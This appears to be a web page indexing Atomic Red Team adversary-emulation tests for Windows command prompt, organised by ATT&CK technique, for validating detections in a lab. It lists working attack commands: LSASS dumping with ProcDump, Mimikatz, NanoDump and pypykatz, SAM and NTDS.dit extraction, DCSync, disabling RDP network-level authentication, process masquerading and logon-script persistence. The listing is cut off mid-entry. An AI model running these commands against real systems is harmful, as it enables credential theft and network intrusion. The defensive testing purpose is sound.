Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate
Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.
Filter by technique ID in the URL: /atomic?technique=T1059

Matching tests · command_prompt (400)
T1003 command_prompt elevated windows Gsecdump
OS Credential Dumping
Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username entries followed by two 32-character hashes. If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator). If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
"#{gsecdump_exe}" -a
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using direct system calls and API unhooking
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created: C:\windows\temp\dumpert.dmp. If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
"#{dumpert_exe}"
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using NanoDump
LSASS Memory
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanodump.dmp file in the temp directory.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 command_prompt elevated windows Offline Credential Theft With Mimikatz
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 command_prompt elevated windows LSASS read with pypykatz
LSASS Memory
Parses secrets hidden in the LSASS process with Python, similar to mimikatz's sekurlsa:: module. Python 3 must be installed; use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. It will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa 
T1003.001 command_prompt elevated windows Create Mini Dump of LSASS.exe using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe. Upon successful execution, you should see the following file created: c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory through Silent Process Exit
LSASS Memory
WerFault.exe (the Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios: either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe is used to create file dumps all the time (not just of lsass.exe), this method provides the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process; from an attacker's standpoint this is appealing because the illicit credential extraction will appear benign, since from a defender's viewpoint it is within the realm of normal activity. Upon successful execution, you should find the dump file in the directory of your choice, or in "%temp%\SilentProcessExit" by default.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.002 command_prompt elevated windows Registry dump of SAM, creds, and secrets
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys and then processed locally using https://github.com/Neohapsis/creddump7. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
T1003.002 command_prompt elevated windows Registry parse with pypykatz
Security Account Manager
Parses registry hives to obtain stored credentials. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live registry
T1003.002 command_prompt elevated windows esentutl.exe SAM copy
Security Account Manager
Copy the SAM hive using the esentutl.exe utility. This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
T1003.002 command_prompt windows dump volume shadow copy hives with certutil
Security Account Manager
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
T1003.002 command_prompt elevated windows Dumping of SAM, creds, and secrets(Reg Export)
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. This test uses reg export to execute this behavior. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with vssadmin
NTDS
This test is intended to be run on a domain controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
T1003.003 command_prompt elevated windows Copy NTDS.dit from Volume Shadow Copy
NTDS
This test is intended to be run on a domain controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires the steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
T1003.003 command_prompt elevated windows Dump Active Directory Database with NTDSUtil
NTDS
This test is intended to be run on a domain controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need for network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with WMI
NTDS
This test is intended to be run on a domain controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely with WMI
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely (WMI) with esentutl
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
T1003.003 command_prompt elevated windows Create Symlink to Volume Shadow Copy
NTDS
This test is intended to be run on a domain controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to a Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with diskshadow
NTDS
This test is intended to be run on a domain controller. It is an alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit.
mkdir c:\exfil
diskshadow.exe /s #(unknown)
T1003.004 command_prompt elevated windows Dumping LSA Secrets
LSA Secrets
Dump the secrets key from the Windows registry. When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
T1003.005 command_prompt windows Cached Credential Dump via Cmdkey
Cached Domain Credentials
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe. Credentials listed with Cmdkey only pertain to the current user. Passwords will not be displayed once they are stored. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
cmdkey /list
T1003.006 command_prompt windows DCSync (Active Directory)
DCSync
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729)
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
T1007 command_prompt elevated windows System Service Discovery
System Service Discovery
Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
tasklist.exe /svc
sc query
sc query state= all
T1007 command_prompt windows System Service Discovery - net.exe
System Service Discovery
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in the temp directory called service-list.txt.
net.exe start >> #{output_file}
T1007 command_prompt windows Get-Service Execution
System Service Discovery
Executes the Get-Service cmdlet to gather objects representing all services on the local system.
powershell.exe Get-Service
T1007 command_prompt windows System Service Discovery - Windows Scheduled Tasks (schtasks)
System Service Discovery
Enumerates scheduled tasks on Windows using schtasks.exe.
schtasks /query /fo LIST /v
T1010 command_prompt windows List Process Main Windows - C# .NET
Application Window Discovery
Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}
T1012 command_prompt elevated windows Query Registry
Query Registry
Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
T1012 command_prompt elevated windows Reg query for AlwaysInstallElevated status
Query Registry
The reg query command allows checking the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine, thus allowing a regular user to install a Microsoft Windows Installer package with system-level privileges. This can be abused by an attacker to escalate privileges on the host to SYSTEM level.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
T1012 command_prompt elevated windows Check Software Inventory Logging (SIL) status via Registry
Query Registry
Microsoft's Software Inventory Logging (SIL) collects information about installed software on a per-host basis. An adversary can use such logs to passively check for the existence of software of interest to them. The status of SIL can be checked via the registry. [Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
T1012 command_prompt windows Inspect SystemStartOptions Value in Registry
Query Registry
The objective of this test is to query the SystemStartOptions value under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings.
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
T1016 command_prompt windows System Network Configuration Discovery on Windows
System Network Configuration Discovery
Identify network configuration information. Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config
T1016 command_prompt windows List Windows Firewall Rules
System Network Configuration Discovery
Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
netsh advfirewall firewall show rule name=all
T1016 command_prompt windows System Network Configuration Discovery (TrickBot Style)
System Network Configuration Discovery
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn ipconfig /all, net config workstation, net view /all /domain, nltest /domain_trusts. Output will be via stdout.
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
T1016 command_prompt windows Adfind - Enumerate Active Directory Subnet Objects
System Network Configuration Discovery
The Adfind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
T1016 command_prompt windows Qakbot Recon
System Network Configuration Discovery
A list of commands known to be performed by Qakbot for recon purposes
"#{recon_commands}"
T1016 command_prompt windows DNS Server Discovery Using nslookup
System Network Configuration Discovery
Identify the domain controller of the system's domain on an endpoint using an nslookup LDAP SRV query. This tool is abused by Qakbot malware to gather information on the domain controller of the targeted or compromised host. Reference: https://securelist.com/qakbot-technical-analysis/103931/
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
T1016.001 command_prompt windows Check internet connection using ping Windows
Internet Connection Discovery
Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -n 4 #{ping_target}
T1016.002 command_prompt windows Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Wi-Fi Discovery
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
netsh wlan show profile * key=clear
T1018 command_prompt windows Remote System Discovery - net
Remote System Discovery
Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled.
net view /domain
net view
T1018 command_prompt windows Remote System Discovery - net group Domain Computers
Remote System Discovery
Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute net.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
net group "Domain Computers" /domain
T1018 command_prompt windows Remote System Discovery - nltest
Remote System Discovery
Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
nltest.exe /dclist:#{target_domain}
T1018 command_prompt windows Remote System Discovery - ping sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
T1018 command_prompt windows Remote System Discovery - arp
Remote System Discovery
Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
arp -a
T1018 command_prompt elevated windows Remote System Discovery - adidnsdump
Remote System Discovery
This tool enables enumeration and exporting of all DNS records in the zone for reconnaissance of internal networks. Python 3 and adidnsdump must be installed; use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list DNS zones in the terminal.
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
T1018 command_prompt windows Adfind - Enumerate Active Directory Computer Objects
Remote System Discovery
The Adfind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
T1018 command_prompt windows Adfind - Enumerate Active Directory Domain Controller Objects
Remote System Discovery
The Adfind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
T1018 command_prompt windows Remote System Discovery - net group Domain Controller
Remote System Discovery
Identify remote systems with net.exe querying the Active Directory Domain Controllers group. Upon successful execution, cmd.exe will execute net.exe against Active Directory to list the "Domain Controllers" in the domain. Output will be via stdout.
net group /domain "Domain controllers"
T1021.001 command_prompt elevated windows Changing RDP Port to Non Standard Port via Command_Prompt
Remote Desktop Protocol
Changing RDP Port to Non Standard Port via Command_Prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
T1021.001 command_prompt windows Disable NLA for RDP via Command Prompt
Remote Desktop Protocol
Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt. Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
T1021.002 command_prompt windows Map admin share
SMB/Windows Admin Shares
Connecting To Remote Shares
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1021.002 command_prompt elevated windows Copy and Execute File with PsExec
SMB/Windows Admin Shares
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 command_prompt elevated windows Execute command writing output to local Admin Share
SMB/Windows Admin Shares
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.004 command_prompt windows ESXi - Enable SSH via VIM-CMD
SSH
An adversary enables SSH on an ESXi host to maintain persistence and create another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1025 command_prompt windows Identify Documents on USB and Removable Media via PowerShell
Data from Removable Media
This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files (e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics how adversaries might scan for sensitive documents on removable devices for exfiltration or analysis.
powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
T1027 command_prompt windows Execution from Compressed File
Obfuscated Files or Information
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
T1027 command_prompt windows Execution from Compressed JScript File
Obfuscated Files or Information
Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
T1027.004 command_prompt windows Compile After Delivery using csc.exe
Compile After Delivery
Compile C# code using the csc.exe binary used by .NET. Upon execution, an exe named T1027.004.exe will be placed in the temp folder.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} "#{input_file}"
T1033 command_prompt windows System Owner/User Discovery
System Owner/User Discovery
Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
T1033 command_prompt windows System Owner/User Discovery Using Command Prompt
System Owner/User Discovery
Identify the system owner or current user using native Windows command prompt utilities.
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
T1036.003 command_prompt windows Masquerading as Windows LSASS process
Rename Legitimate Utilities
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, the test will hang until the 120 second timeout cancels the session.
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
T1036.003 command_prompt windows Masquerading - cscript.exe running as notepad.exe
Rename Legitimate Utilities
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from a non-standard path.
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
T1036.003 command_prompt windows Masquerading - wscript.exe running as svchost.exe
Rename Legitimate Utilities
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open, but wscript will have been renamed to svchost and run out of the temp folder.
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
T1036.003 command_prompt windows Masquerading - powershell.exe running as taskhostw.exe
Rename Legitimate Utilities
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from a non-standard path.
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
T1036.003 command_prompt elevated windows Malicious process Masquerading as LSM.exe
Rename Legitimate Utilities
Detect LSM running from an incorrect directory and an incorrect service account. This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from a non-standard path.
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
T1036.004 command_prompt elevated windows Creating W32Time similar named service using schtasks
Masquerade Task or Service
Creating a service with a name similar to W32Time (win32times) using schtasks, just like the threat actor dubbed "Operation Wocao".
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times
T1036.004 command_prompt elevated windows Creating W32Time similar named service using sc
Masquerade Task or Service
Creating a service with a name similar to W32Time (win32times) using sc, just like the threat actor dubbed "Operation Wocao".
sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times
T1036.007 command_prompt windows File Extension Masquerading
Double File Extension
Download and execute a file masquerading as an image or Office file. Upon execution, 3 calc instances and 3 vbs windows will be launched. E.g. SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quarterlyreport.docx.exe)
copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
%temp%\T1036.007_masquerading.docx.exe
%temp%\T1036.007_masquerading.pdf.exe
%temp%\T1036.007_masquerading.ps1.exe
%temp%\T1036.007_masquerading.xls.vbs
%temp%\T1036.007_masquerading.xlsx.vbs
%temp%\T1036.007_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
T1037.001 command_prompt windows Logon Scripts
Logon Script (Windows)
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor.
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
T1039 command_prompt elevated windows Copy a sensitive File over Administrative share with copy
Data from Network Shared Drive
Copy a sensitive file from the C$ share of another LAN computer with the copy command. https://twitter.com/SBousseaden/status/1211636381086339073
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
T1040 command_prompt elevated windows Packet Capture Windows Command Prompt
Network Sniffing
Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
T1040 command_prompt elevated windows Windows Internal Packet Capture
Network Sniffing
Uses the built-in Windows packet capture. After execution you should find files named trace.etl and trace.cab in the temp directory.
netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
T1040 command_prompt elevated windows Windows Internal pktmon capture
Network Sniffing
